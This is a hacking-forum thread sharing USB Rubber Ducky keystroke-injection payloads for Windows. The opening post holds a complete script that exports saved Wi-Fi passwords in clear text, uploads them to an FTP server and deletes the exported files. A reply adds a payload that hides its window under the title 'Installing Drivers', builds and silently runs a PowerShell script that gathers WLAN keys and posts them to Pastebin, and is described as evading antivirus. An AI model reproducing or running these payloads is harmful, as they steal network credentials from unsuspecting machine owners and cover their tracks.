Jump to content

Recommended Posts

Posted

For windows 7....This script will export the wifi settings then send to an ftp server of your choice. the cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but works in under a minute.

DELAY 2000

ESCAPE

CONTROL ESCAPE

DELAY 400

STRING cmd

ENTER

DELAY 400

STRING netsh wlan export profile key=clear

ENTER

DELAY 400

STRING cd %USERPROFILE%

ENTER

DELAY 400

STRING ftp -i FTPSERVER

ENTER

DELAY 400

STRING LOGIN NAME

ENTER

DELAY 400

STRING LOGIN PASSWORD

ENTER

DELAY 600

STRING prompt

ENTER

DELAY 400

STRING prompt

ENTER

DELAY 400

STRING MPUT *.xml

ENTER

DELAY 2000

STRING bye

ENTER

DELAY 400

STRING del *.xml

ENTER

DELAY 200

ALT SPACE

STRING c

Posted (edited)

I ran the cmd netsh wlan export profile key=clear and i do not see that password in clear text, just along string of number and letters, which means it is encrypted

You can not reinstall the exported profile on a new machine because the hash is machine specific.

Edited by mreidiv
Posted (edited)

There is a Kautilya payload that exports WLAN passwords to a Pastebin account. It has also been added to duck sauce v.02. I'll add it here if anyone wants to try it out. It works prefectly on my Teensy with Kautilya, so it can probably work on the Ducky. This is undetected by Bitdefender Total Security 2013 if anyone was wondering.

REM Description: Grabs WLAN Key information

REM Author: COnverted from Kautilya by Prickleypaw

REM DuckSauce v0.2 by Prickleypaw

REM ---- Command Prompt DuckSauce v.02 ----

ESCAPE

CONTROL ESCAPE

STRING cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers"

ENTER

DELAY 250

STRING echo $wlans = netsh wlan show profiles ^| Select-String -Pattern "All User Profile" ^| Foreach-Object {$_.ToString()} > %temp%\wlan.ps1

ENTER

STRING echo $exportdata = $wlans ^| Foreach-Object {$_.Replace("    All User Profile     : ",$null)} >> %temp%\wlan.ps1

ENTER

STRING echo $data = $exportdata ^| ForEach-Object {netsh wlan show profiles name="$_" key=clear} >> %temp%\wlan.ps1

ENTER

STRING echo Function Post_http($url,$parameters) >> %temp%\wlan.ps1

ENTER

STRING echo { >> %temp%\wlan.ps1

ENTER

STRING echo $http_request = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\wlan.ps1

ENTER

STRING echo $http_request.open("POST", $url, $false) >> %temp%\wlan.ps1

ENTER

STRING echo $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") >> %temp%\wlan.ps1

ENTER

STRING echo $http_request.setRequestHeader("Content-length", $parameters.length); >> %temp%\wlan.ps1

ENTER

STRING echo $http_request.setRequestHeader("Connection", "close") >> %temp%\wlan.ps1

ENTER

STRING echo $http_request.send($parameters) >> %temp%\wlan.ps1

ENTER

STRING echo $script:session_key=$http_request.responseText >> %temp%\wlan.ps1

ENTER

STRING echo $session_key >> %temp%\wlan.ps1

ENTER

STRING echo } >> %temp%\wlan.ps1

ENTER

REM ---- need to enter Pastebin information below ----

STRING echo Post_http "http://pastebin.com/api/api_login.php" "api_dev_key=INPUT2&api_user_name=INPUT0&api_user_password=INPUT1" >> %temp%\wlan.ps1

ENTER

STRING echo Post_http "http://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=INPUT2&api_paste_name=Wlan_Info&api_paste_code=$data&api_paste_private=2" >> %temp%\wlan.ps1

ENTER

STRING echo Set oShell = CreateObject("WScript.Shell") > %temp%\wlan.vbs

ENTER

STRING echo oShell.Run("powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\wlan.ps1"),0,true >> %temp%\wlan.vbs

ENTER

STRING wscript %temp%\wlan.vbs

ENTER

STRING exit

ENTER

STRING exit
Edited by DrDinosaur
Posted

Sadly, it seems you are correct. I ran on my machine and got unfiltered. ran on a client and came up encrypted. Not sure the user i tested on was an administrator of the machine, I know I am. Wondering if that is the issue?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...